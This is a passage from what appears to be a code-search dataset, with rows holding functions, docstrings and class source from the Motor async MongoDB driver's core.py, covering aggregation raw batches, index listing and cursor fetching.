return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticCollection.aggregate_raw_batches | python | def aggregate_raw_batches(self, pipeline, **kwargs):
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs)) | Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0 | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L664-L690 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find(self, *args, **kwargs):
"""Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations.
"""
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate(self, pipeline, **kwargs):
"""Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def list_indexes(self, session=None):
"""Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')])
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticCollection.list_indexes | python | def list_indexes(self, session=None):
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_list_indexes, session=session) | Get a cursor over the index documents for this collection. ::
async def print_indexes():
async for index in db.test.list_indexes():
print(index)
If the only index is the default index on ``_id``, this might print::
SON([('v', 1), ('key', SON([('_id', 1)])), ('name', '_id_'), ('ns', 'test.test')]) | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L818-L833 | [
"def create_class_with_framework(cls, framework, module_name):\n motor_class_name = framework.CLASS_PREFIX + cls.__motor_class_name__\n cache_key = (cls, motor_class_name, framework)\n cached_class = _class_cache.get(cache_key)\n if cached_class:\n return cached_class\n\n new_class = type(str(... | class AgnosticCollection(AgnosticBaseProperties):
__motor_class_name__ = 'MotorCollection'
__delegate_class__ = Collection
bulk_write = AsyncCommand(doc=bulk_write_doc)
count_documents = AsyncRead()
create_index = AsyncCommand()
create_indexes = AsyncCommand(doc=create_indexes_doc)
delete_many = AsyncCommand(doc=delete_many_doc)
delete_one = AsyncCommand(doc=delete_one_doc)
distinct = AsyncRead()
drop = AsyncCommand(doc=drop_doc)
drop_index = AsyncCommand()
drop_indexes = AsyncCommand()
estimated_document_count = AsyncCommand()
find_one = AsyncRead(doc=find_one_doc)
find_one_and_delete = AsyncCommand(doc=find_one_and_delete_doc)
find_one_and_replace = AsyncCommand(doc=find_one_and_replace_doc)
find_one_and_update = AsyncCommand(doc=find_one_and_update_doc)
full_name = ReadOnlyProperty()
index_information = AsyncRead(doc=index_information_doc)
inline_map_reduce = AsyncRead()
insert_many = AsyncWrite(doc=insert_many_doc)
insert_one = AsyncCommand(doc=insert_one_doc)
map_reduce = AsyncCommand(doc=mr_doc).wrap(Collection)
name = ReadOnlyProperty()
options = AsyncRead()
reindex = AsyncCommand()
rename = AsyncCommand()
replace_one = AsyncCommand(doc=replace_one_doc)
update_many = AsyncCommand(doc=update_many_doc)
update_one = AsyncCommand(doc=update_one_doc)
with_options = DelegateMethod().wrap(Collection)
_async_aggregate = AsyncRead(attr_name='aggregate')
_async_aggregate_raw_batches = AsyncRead(attr_name='aggregate_raw_batches')
_async_list_indexes = AsyncRead(attr_name='list_indexes')
def __init__(self, database, name, codec_options=None,
read_preference=None, write_concern=None, read_concern=None,
_delegate=None):
db_class = create_class_with_framework(
AgnosticDatabase, self._framework, self.__module__)
if not isinstance(database, db_class):
raise TypeError("First argument to MotorCollection must be "
"MotorDatabase, not %r" % database)
delegate = _delegate or Collection(
database.delegate, name, codec_options=codec_options,
read_preference=read_preference, write_concern=write_concern,
read_concern=read_concern)
super(self.__class__, self).__init__(delegate)
self.database = database
def __getattr__(self, name):
# Dotted collection name, like "foo.bar".
if name.startswith('_'):
full_name = "%s.%s" % (self.name, name)
raise AttributeError(
"%s has no attribute %r. To access the %s"
" collection, use database['%s']." % (
self.__class__.__name__, name, full_name, full_name))
return self[name]
def __getitem__(self, name):
collection_class = create_class_with_framework(
AgnosticCollection, self._framework, self.__module__)
return collection_class(self.database, self.name + '.' + name,
_delegate=self.delegate[name])
def __call__(self, *args, **kwargs):
raise TypeError(
"MotorCollection object is not callable. If you meant to "
"call the '%s' method on a MotorCollection object it is "
"failing because no such method exists." %
self.delegate.name)
def find(self, *args, **kwargs):
"""Create a :class:`MotorCursor`. Same parameters as for
PyMongo's :meth:`~pymongo.collection.Collection.find`.
Note that ``find`` does not require an ``await`` expression, because
``find`` merely creates a
:class:`MotorCursor` without performing any operations on the server.
``MotorCursor`` methods such as :meth:`~MotorCursor.to_list`
perform actual operations.
"""
cursor = self.delegate.find(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def find_raw_batches(self, *args, **kwargs):
"""Query the database and retrieve batches of raw BSON.
Similar to the :meth:`find` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.find_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``find_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor = self.delegate.find_raw_batches(*unwrap_args_session(args),
**unwrap_kwargs_session(kwargs))
cursor_class = create_class_with_framework(
AgnosticRawBatchCursor, self._framework, self.__module__)
return cursor_class(cursor, self)
def aggregate(self, pipeline, **kwargs):
"""Execute an aggregation pipeline on this collection.
The aggregation can be run on a secondary if the client is connected
to a replica set and its ``read_preference`` is not :attr:`PRIMARY`.
:Parameters:
- `pipeline`: a single command or list of aggregation commands
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`, created with
:meth:`~MotorClient.start_session`.
- `**kwargs`: send arbitrary parameters to the aggregate command
Returns a :class:`MotorCommandCursor` that can be iterated like a
cursor from :meth:`find`::
pipeline = [{'$project': {'name': {'$toUpper': '$name'}}}]
cursor = collection.aggregate(pipeline)
while (yield cursor.fetch_next):
doc = cursor.next_object()
print(doc)
In Python 3.5 and newer, aggregation cursors can be iterated elegantly
in native coroutines with `async for`::
async def f():
async for doc in collection.aggregate(pipeline):
print(doc)
:class:`MotorCommandCursor` does not allow the ``explain`` option. To
explain MongoDB's query plan for the aggregation, use
:meth:`MotorDatabase.command`::
async def f():
plan = await db.command(
'aggregate', 'COLLECTION-NAME',
pipeline=[{'$project': {'x': 1}}],
explain=True)
print(plan)
.. versionchanged:: 1.0
:meth:`aggregate` now **always** returns a cursor.
.. versionchanged:: 0.5
:meth:`aggregate` now returns a cursor by default,
and the cursor is returned immediately without a ``yield``.
See :ref:`aggregation changes in Motor 0.5 <aggregate_changes_0_5>`.
.. versionchanged:: 0.2
Added cursor support.
.. _aggregate command:
http://docs.mongodb.org/manual/applications/aggregation
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate, pipeline,
**unwrap_kwargs_session(kwargs))
def aggregate_raw_batches(self, pipeline, **kwargs):
"""Perform an aggregation and retrieve batches of raw BSON.
Similar to the :meth:`aggregate` method but returns each batch as bytes.
This example demonstrates how to work with raw batches, but in practice
raw batches should be passed to an external library that can decode
BSON into another data type, rather than used with PyMongo's
:mod:`bson` module.
.. code-block:: python3
async def get_raw():
cursor = db.test.aggregate_raw_batches()
async for batch in cursor:
print(bson.decode_all(batch))
Note that ``aggregate_raw_batches`` does not support sessions.
.. versionadded:: 2.0
"""
cursor_class = create_class_with_framework(
AgnosticLatentCommandCursor, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, self._async_aggregate_raw_batches, pipeline,
**unwrap_kwargs_session(kwargs))
def watch(self, pipeline=None, full_document='default', resume_after=None,
max_await_time_ms=None, batch_size=None, collation=None,
start_at_operation_time=None, session=None):
"""Watch changes on this collection.
Returns a :class:`~MotorChangeStream` cursor which iterates over changes
on this collection. Introduced in MongoDB 3.6.
A change stream continues waiting indefinitely for matching change
events. Code like the following allows a program to cancel the change
stream and exit.
.. code-block:: python3
change_stream = None
async def watch_collection():
global change_stream
# Using the change stream in an "async with" block
# ensures it is canceled promptly if your code breaks
# from the loop or throws an exception.
async with db.collection.watch() as change_stream:
async for change in stream:
print(change)
# Tornado
from tornado.ioloop import IOLoop
def main():
loop = IOLoop.current()
# Start watching collection for changes.
loop.add_callback(watch_collection)
try:
loop.start()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# asyncio
from asyncio import get_event_loop
def main():
loop = get_event_loop()
task = loop.create_task(watch_collection)
try:
loop.run_forever()
except KeyboardInterrupt:
pass
finally:
if change_stream is not None:
change_stream.close()
# Prevent "Task was destroyed but it is pending!"
loop.run_until_complete(task)
The :class:`~MotorChangeStream` async iterable blocks
until the next change document is returned or an error is raised. If
the :meth:`~MotorChangeStream.next` method encounters
a network error when retrieving a batch from the server, it will
automatically attempt to recreate the cursor such that no change
events are missed. Any error encountered during the resume attempt
indicates there may be an outage and will be raised.
.. code-block:: python3
try:
pipeline = [{'$match': {'operationType': 'insert'}}]
async with db.collection.watch(pipeline) as stream:
async for change in stream:
print(change)
except pymongo.errors.PyMongoError:
# The ChangeStream encountered an unrecoverable error or the
# resume attempt failed to recreate the cursor.
logging.error('...')
For a precise description of the resume process see the
`change streams specification`_.
:Parameters:
- `pipeline` (optional): A list of aggregation pipeline stages to
append to an initial ``$changeStream`` stage. Not all
pipeline stages are valid after a ``$changeStream`` stage, see the
MongoDB documentation on change streams for the supported stages.
- `full_document` (optional): The fullDocument option to pass
to the ``$changeStream`` stage. Allowed values: 'default',
'updateLookup'. Defaults to 'default'.
When set to 'updateLookup', the change notification for partial
updates will include both a delta describing the changes to the
document, as well as a copy of the entire document that was
changed from some time after the change occurred.
- `resume_after` (optional): The logical starting point for this
change stream.
- `max_await_time_ms` (optional): The maximum time in milliseconds
for the server to wait for changes before responding to a getMore
operation.
- `batch_size` (optional): The maximum number of documents to return
per batch.
- `collation` (optional): The :class:`~pymongo.collation.Collation`
to use for the aggregation.
- `session` (optional): a
:class:`~pymongo.client_session.ClientSession`.
:Returns:
A :class:`~MotorChangeStream`.
See the :ref:`tornado_change_stream_example`.
.. versionadded:: 1.2
.. mongodoc:: changeStreams
.. _change streams specification:
https://github.com/mongodb/specifications/blob/master/source/change-streams.rst
"""
cursor_class = create_class_with_framework(
AgnosticChangeStream, self._framework, self.__module__)
# Latent cursor that will send initial command on first "async for".
return cursor_class(self, pipeline, full_document, resume_after,
max_await_time_ms, batch_size, collation,
start_at_operation_time, session)
def wrap(self, obj):
if obj.__class__ is Collection:
# Replace pymongo.collection.Collection with MotorCollection.
return self.__class__(self.database, obj.name, _delegate=obj)
elif obj.__class__ is Cursor:
return AgnosticCursor(obj, self)
elif obj.__class__ is CommandCursor:
command_cursor_class = create_class_with_framework(
AgnosticCommandCursor,
self._framework,
self.__module__)
return command_cursor_class(obj, self)
elif obj.__class__ is ChangeStream:
change_stream_class = create_class_with_framework(
AgnosticChangeStream,
self._framework,
self.__module__)
return change_stream_class(obj, self)
else:
return obj
def get_io_loop(self):
return self.database.get_io_loop()
|
mongodb/motor | motor/core.py | AgnosticBaseCursor._get_more | python | def _get_more(self):
if not self.alive:
raise pymongo.errors.InvalidOperation(
"Can't call get_more() on a MotorCursor that has been"
" exhausted or killed.")
self.started = True
return self._refresh() | Initial query or getMore. Returns a Future. | train | https://github.com/mongodb/motor/blob/6af22720723bde7c78eb8cb126962cfbfc034b2c/motor/core.py#L900-L908 | null | class AgnosticBaseCursor(AgnosticBase):
"""Base class for AgnosticCursor and AgnosticCommandCursor"""
_refresh = AsyncRead()
address = ReadOnlyProperty()
cursor_id = ReadOnlyProperty()
alive = ReadOnlyProperty()
session = ReadOnlyProperty()
def __init__(self, cursor, collection):
"""Don't construct a cursor yourself, but acquire one from methods like
:meth:`MotorCollection.find` or :meth:`MotorCollection.aggregate`.
.. note::
There is no need to manually close cursors; they are closed
by the server after being fully iterated
with :meth:`to_list`, :meth:`each`, or :attr:`fetch_next`, or
automatically closed by the client when the :class:`MotorCursor` is
cleaned up by the garbage collector.
"""
# 'cursor' is a PyMongo Cursor, CommandCursor, or a _LatentCursor.
super(AgnosticBaseCursor, self).__init__(delegate=cursor)
self.collection = collection
self.started = False
self.closed = False
# python.org/dev/peps/pep-0492/#api-design-and-implementation-revisions
if PY35:
exec(textwrap.dedent("""
def __aiter__(self):
return self
async def __anext__(self):
# An optimization: skip the "await" if possible.
if self._buffer_size() or await self.fetch_next:
return self.next_object()
raise StopAsyncIteration()
"""), globals(), locals())
@property
@coroutine_annotation
def fetch_next(self):
"""A Future used with `gen.coroutine`_ to asynchronously retrieve the
next document in the result set, fetching a batch of documents from the
server if necessary. Resolves to ``False`` if there are no more
documents, otherwise :meth:`next_object` is guaranteed to return a
document.
.. _`gen.coroutine`: http://tornadoweb.org/en/stable/gen.html
.. doctest:: fetch_next
:hide:
>>> _ = MongoClient().test.test_collection.delete_many({})
>>> collection = MotorClient().test.test_collection
.. doctest:: fetch_next
>>> @gen.coroutine
... def f():
... yield collection.insert_many([{'_id': i} for i in range(5)])
... cursor = collection.find().sort([('_id', 1)])
... while (yield cursor.fetch_next):
... doc = cursor.next_object()
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
While it appears that fetch_next retrieves each document from
the server individually, the cursor actually fetches documents
efficiently in `large batches`_.
In Python 3.5 and newer, cursors can be iterated elegantly and very
efficiently in native coroutines with `async for`:
.. doctest:: fetch_next
>>> async def f():
... async for doc in collection.find():
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
.. _`large batches`: https://docs.mongodb.com/manual/tutorial/iterate-a-cursor/#cursor-batches
"""
if not self._buffer_size() and self.alive:
# Return the Future, which resolves to number of docs fetched or 0.
return self._get_more()
elif self._buffer_size():
future = self._framework.get_future(self.get_io_loop())
future.set_result(True)
return future
else:
# Dead
future = self._framework.get_future(self.get_io_loop())
future.set_result(False)
return future
def next_object(self):
"""Get a document from the most recently fetched batch, or ``None``.
See :attr:`fetch_next`.
"""
if not self._buffer_size():
return None
return next(self.delegate)
def each(self, callback):
"""Iterates over all the documents for this cursor.
:meth:`each` returns immediately, and `callback` is executed asynchronously
for each document. `callback` is passed ``(None, None)`` when iteration
is complete.
Cancel iteration early by returning ``False`` from the callback. (Only
``False`` cancels iteration: returning ``None`` or 0 does not.)
.. testsetup:: each
from tornado.ioloop import IOLoop
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many(
[{'_id': i} for i in range(5)])
collection = MotorClient().test.test_collection
.. doctest:: each
>>> def each(result, error):
... if error:
... raise error
... elif result:
... sys.stdout.write(str(result['_id']) + ', ')
... else:
... # Iteration complete
... IOLoop.current().stop()
... print('done')
...
>>> cursor = collection.find().sort([('_id', 1)])
>>> cursor.each(callback=each)
>>> IOLoop.current().start()
0, 1, 2, 3, 4, done
.. note:: Unlike other Motor methods, ``each`` requires a callback and
does not return a Future, so it cannot be used in a coroutine.
``async for``, :meth:`to_list`, :attr:`fetch_next` are much easier to
use.
:Parameters:
- `callback`: function taking (document, error)
"""
if not callable(callback):
raise callback_type_error
self._each_got_more(callback, None)
def _each_got_more(self, callback, future):
if future:
try:
future.result()
except Exception as error:
callback(None, error)
return
while self._buffer_size() > 0:
doc = next(self.delegate) # decrements self.buffer_size
# Quit if callback returns exactly False (not None). Note we
# don't close the cursor: user may want to resume iteration.
if callback(doc, None) is False:
return
# The callback closed this cursor?
if self.closed:
return
if self.alive and (self.cursor_id or not self.started):
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._each_got_more, callback)
else:
# Complete
self._framework.call_soon(
self.get_io_loop(),
functools.partial(callback, None, None))
@coroutine_annotation
def to_list(self, length):
"""Get a list of documents.
.. testsetup:: to_list
MongoClient().test.test_collection.delete_many({})
MongoClient().test.test_collection.insert_many([{'_id': i} for i in range(4)])
from tornado import ioloop
.. doctest:: to_list
>>> from motor.motor_tornado import MotorClient
>>> collection = MotorClient().test.test_collection
>>>
>>> @gen.coroutine
... def f():
... cursor = collection.find().sort([('_id', 1)])
... docs = yield cursor.to_list(length=2)
... while docs:
... print(docs)
... docs = yield cursor.to_list(length=2)
...
... print('done')
...
>>> ioloop.IOLoop.current().run_sync(f)
[{'_id': 0}, {'_id': 1}]
[{'_id': 2}, {'_id': 3}]
done
:Parameters:
- `length`: maximum number of documents to return for this call, or
None
Returns a Future.
.. versionchanged:: 2.0
No longer accepts a callback argument.
.. versionchanged:: 0.2
`callback` must be passed as a keyword argument, like
``to_list(10, callback=callback)``, and the
`length` parameter is no longer optional.
"""
if length is not None:
if not isinstance(length, int):
raise TypeError('length must be an int, not %r' % length)
elif length < 0:
raise ValueError('length must be non-negative')
if self._query_flags() & _QUERY_OPTIONS['tailable_cursor']:
raise pymongo.errors.InvalidOperation(
"Can't call to_list on tailable cursor")
future = self._framework.get_future(self.get_io_loop())
if not self.alive:
future.set_result([])
else:
the_list = []
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
return future
def _to_list(self, length, the_list, future, get_more_result):
# get_more_result is the result of self._get_more().
# to_list_future will be the result of the user's to_list() call.
try:
result = get_more_result.result()
collection = self.collection
fix_outgoing = collection.database.delegate._fix_outgoing
if length is None:
n = result
else:
n = min(length, result)
for _ in range(n):
the_list.append(fix_outgoing(self._data().popleft(),
collection))
reached_length = (length is not None and len(the_list) >= length)
if reached_length or not self.alive:
future.set_result(the_list)
else:
self._framework.add_future(
self.get_io_loop(),
self._get_more(),
self._to_list, length, the_list, future)
except Exception as exc:
future.set_exception(exc)
def get_io_loop(self):
return self.collection.get_io_loop()
@motor_coroutine
def close(self):
"""Explicitly kill this cursor on the server. Call like (in Tornado):
.. code-block:: python
yield cursor.close()
"""
if not self.closed:
self.closed = True
yield self._framework.yieldable(self._close())
def batch_size(self, batch_size):
self.delegate.batch_size(batch_size)
return self
def _buffer_size(self):
return len(self._data())
# Paper over some differences between PyMongo Cursor and CommandCursor.
def _query_flags(self):
raise NotImplementedError
def _data(self):
raise NotImplementedError
def _clear_cursor_id(self):
raise NotImplementedError
def _close_exhaust_cursor(self):
raise NotImplementedError
def _killed(self):
raise NotImplementedError
@motor_coroutine
def _close(self):
raise NotImplementedError()
|
mongodb/motor | motor/core.py | AgnosticBaseCursor.fetch_next | python | def fetch_next(self):
if not self._buffer_size() and self.alive:
# Return the Future, which resolves to number of docs fetched or 0.
return self._get_more()
elif self._buffer_size():
future = self._framework.get_future(self.get_io_loop())
future.set_result(True)
return future
else:
# Dead
future = self._framework.get_future(self.get_io_loop())
future.set_result(False)
return future | A Future used with `gen.coroutine`_ to asynchronously retrieve the
next document in the result set, fetching a batch of documents from the
server if necessary. Resolves to ``False`` if there are no more
documents, otherwise :meth:`next_object` is guaranteed to return a
document.
.. _`gen.coroutine`: http://tornadoweb.org/en/stable/gen.html
.. doctest:: fetch_next
:hide:
>>> _ = MongoClient().test.test_collection.delete_many({})
>>> collection = MotorClient().test.test_collection
.. doctest:: fetch_next
>>> @gen.coroutine
... def f():
... yield collection.insert_many([{'_id': i} for i in range(5)])
... cursor = collection.find().sort([('_id', 1)])
... while (yield cursor.fetch_next):
... doc = cursor.next_object()
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
While it appears that fetch_next retrieves each document from
the server individually, the cursor actually fetches documents
efficiently in `large batches`_.
In Python 3.5 and newer, cursors can be iterated elegantly and very
efficiently in native coroutines with `async for`:
.. doctest:: fetch_next
>>> async def f():
... async for doc in collection.find():
... sys.stdout.write(str(doc['_id']) + ', ')
... print('done')
...
>>> IOLoop.current().run_sync(f)
0, 1, 2, 3, 4, done
